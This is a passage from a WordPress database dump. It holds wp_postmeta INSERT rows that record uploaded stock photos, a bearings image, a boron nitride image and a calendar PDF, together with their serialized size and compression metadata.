";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (458, 250, '_wp_attached_file', '2016/08/canstockphoto13010266.jpg'); 
INSERT INTO `wp_postmeta` VALUES (459, 250, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3305;s:6:"height";i:2048;s:4:"file";s:33:"2016/08/canstockphoto13010266.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:33:"canstockphoto13010266-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:33:"canstockphoto13010266-800x496.jpg";s:5:"width";i:800;s:6:"height";i:496;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:33:"canstockphoto13010266-768x476.jpg";s:5:"width";i:768;s:6:"height";i:476;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:34:"canstockphoto13010266-1600x991.jpg";s:5:"width";i:1600;s:6:"height";i:991;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:33:"canstockphoto13010266-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:33:"canstockphoto13010266-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:33:"canstockphoto13010266-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:33:"canstockphoto13010266-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (460, 251, '_wp_attached_file', '2016/08/canstockphoto17094490.jpg'); 
INSERT INTO `wp_postmeta` VALUES (461, 251, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3000;s:6:"height";i:1992;s:4:"file";s:33:"2016/08/canstockphoto17094490.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:33:"canstockphoto17094490-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:33:"canstockphoto17094490-800x531.jpg";s:5:"width";i:800;s:6:"height";i:531;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:33:"canstockphoto17094490-768x510.jpg";s:5:"width";i:768;s:6:"height";i:510;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:35:"canstockphoto17094490-1600x1062.jpg";s:5:"width";i:1600;s:6:"height";i:1062;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:33:"canstockphoto17094490-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:33:"canstockphoto17094490-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:33:"canstockphoto17094490-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:33:"canstockphoto17094490-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:56;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (462, 252, '_wp_attached_file', '2016/08/canstockphoto18648112.jpg'); 
INSERT INTO `wp_postmeta` VALUES (463, 252, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3000;s:6:"height";i:2002;s:4:"file";s:33:"2016/08/canstockphoto18648112.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:33:"canstockphoto18648112-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:33:"canstockphoto18648112-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:33:"canstockphoto18648112-768x513.jpg";s:5:"width";i:768;s:6:"height";i:513;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:35:"canstockphoto18648112-1600x1068.jpg";s:5:"width";i:1600;s:6:"height";i:1068;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:33:"canstockphoto18648112-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:33:"canstockphoto18648112-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:33:"canstockphoto18648112-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:33:"canstockphoto18648112-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"7";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (464, 253, '_wp_attached_file', '2016/08/canstockphoto18902100.jpg'); 
INSERT INTO `wp_postmeta` VALUES (465, 253, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3000;s:6:"height";i:2000;s:4:"file";s:33:"2016/08/canstockphoto18902100.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:33:"canstockphoto18902100-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:33:"canstockphoto18902100-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:33:"canstockphoto18902100-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:35:"canstockphoto18902100-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:33:"canstockphoto18902100-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:33:"canstockphoto18902100-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:33:"canstockphoto18902100-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:33:"canstockphoto18902100-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (466, 254, '_wp_attached_file', '2016/08/canstockphoto19101885.jpg'); 
INSERT INTO `wp_postmeta` VALUES (467, 254, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3000;s:6:"height";i:2000;s:4:"file";s:33:"2016/08/canstockphoto19101885.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:33:"canstockphoto19101885-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:33:"canstockphoto19101885-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:33:"canstockphoto19101885-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:35:"canstockphoto19101885-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:33:"canstockphoto19101885-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:33:"canstockphoto19101885-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:33:"canstockphoto19101885-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:33:"canstockphoto19101885-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:44;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (468, 255, '_wp_attached_file', '2016/08/canstockphoto20506280.jpg'); 
INSERT INTO `wp_postmeta` VALUES (469, 255, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3000;s:6:"height";i:1987;s:4:"file";s:33:"2016/08/canstockphoto20506280.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:33:"canstockphoto20506280-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:33:"canstockphoto20506280-800x530.jpg";s:5:"width";i:800;s:6:"height";i:530;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:33:"canstockphoto20506280-768x509.jpg";s:5:"width";i:768;s:6:"height";i:509;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:35:"canstockphoto20506280-1600x1060.jpg";s:5:"width";i:1600;s:6:"height";i:1060;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:33:"canstockphoto20506280-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:33:"canstockphoto20506280-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:33:"canstockphoto20506280-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:33:"canstockphoto20506280-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (470, 256, '_wp_attached_file', '2016/08/canstockphoto23808251.jpg'); 
INSERT INTO `wp_postmeta` VALUES (471, 256, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3000;s:6:"height";i:1992;s:4:"file";s:33:"2016/08/canstockphoto23808251.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:33:"canstockphoto23808251-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:33:"canstockphoto23808251-800x531.jpg";s:5:"width";i:800;s:6:"height";i:531;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:33:"canstockphoto23808251-768x510.jpg";s:5:"width";i:768;s:6:"height";i:510;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:35:"canstockphoto23808251-1600x1062.jpg";s:5:"width";i:1600;s:6:"height";i:1062;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:33:"canstockphoto23808251-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:33:"canstockphoto23808251-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:33:"canstockphoto23808251-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:33:"canstockphoto23808251-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:56;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (472, 257, '_wp_attached_file', '2016/08/canstockphoto23884332.jpg'); 
INSERT INTO `wp_postmeta` VALUES (473, 257, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3000;s:6:"height";i:2000;s:4:"file";s:33:"2016/08/canstockphoto23884332.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:33:"canstockphoto23884332-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:33:"canstockphoto23884332-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:33:"canstockphoto23884332-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:35:"canstockphoto23884332-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:33:"canstockphoto23884332-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:33:"canstockphoto23884332-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:33:"canstockphoto23884332-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:33:"canstockphoto23884332-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"7";s:8:"quantity";d:44;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (474, 258, '_wp_attached_file', '2016/08/canstockphoto24986129.jpg'); 
INSERT INTO `wp_postmeta` VALUES (475, 258, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1600;s:6:"height";i:1218;s:4:"file";s:33:"2016/08/canstockphoto24986129.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:33:"canstockphoto24986129-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:33:"canstockphoto24986129-800x609.jpg";s:5:"width";i:800;s:6:"height";i:609;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:33:"canstockphoto24986129-768x585.jpg";s:5:"width";i:768;s:6:"height";i:585;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:35:"canstockphoto24986129-1600x1218.jpg";s:5:"width";i:1600;s:6:"height";i:1218;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:33:"canstockphoto24986129-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:33:"canstockphoto24986129-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:33:"canstockphoto24986129-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:33:"canstockphoto24986129-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (476, 259, '_wp_attached_file', '2016/08/canstockphoto25435935.jpg'); 
INSERT INTO `wp_postmeta` VALUES (477, 259, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3000;s:6:"height";i:2000;s:4:"file";s:33:"2016/08/canstockphoto25435935.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:33:"canstockphoto25435935-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:33:"canstockphoto25435935-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:33:"canstockphoto25435935-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:35:"canstockphoto25435935-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:33:"canstockphoto25435935-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:33:"canstockphoto25435935-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:33:"canstockphoto25435935-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:33:"canstockphoto25435935-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (478, 260, '_wp_attached_file', '2016/08/canstockphoto25461977.jpg'); 
INSERT INTO `wp_postmeta` VALUES (479, 260, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3000;s:6:"height";i:1978;s:4:"file";s:33:"2016/08/canstockphoto25461977.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:33:"canstockphoto25461977-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:33:"canstockphoto25461977-800x527.jpg";s:5:"width";i:800;s:6:"height";i:527;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:33:"canstockphoto25461977-768x506.jpg";s:5:"width";i:768;s:6:"height";i:506;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:35:"canstockphoto25461977-1600x1055.jpg";s:5:"width";i:1600;s:6:"height";i:1055;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:33:"canstockphoto25461977-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:33:"canstockphoto25461977-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:33:"canstockphoto25461977-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:33:"canstockphoto25461977-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (482, 264, '_wp_attached_file', '2016/08/Bearings-1-2.jpg'); 
INSERT INTO `wp_postmeta` VALUES (483, 264, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3888;s:6:"height";i:2592;s:4:"file";s:24:"2016/08/Bearings-1-2.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:24:"Bearings-1-2-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:24:"Bearings-1-2-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:24:"Bearings-1-2-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:26:"Bearings-1-2-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:24:"Bearings-1-2-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:24:"Bearings-1-2-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:24:"Bearings-1-2-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:24:"Bearings-1-2-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (514, 267, '_wp_attached_file', '2016/08/Calendar-Print-Preview.pdf'); 
INSERT INTO `wp_postmeta` VALUES (549, 289, '_wp_attached_file', '2016/08/Boron-nitride.jpg'); 
INSERT INTO `wp_postmeta` VALUES (550, 289, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5472;s:6:"height";i:3648;s:4:"file";s:25:"2016/08/Boron-nitride.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:25:"Boron-nitride-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:25:"Boron-nitride-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:25:"Boron-nitride-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:27:"Boron-nitride-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:25:"Boron-nitride-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:25:"Boron-nitride-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:25:"Boron-nitride-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-t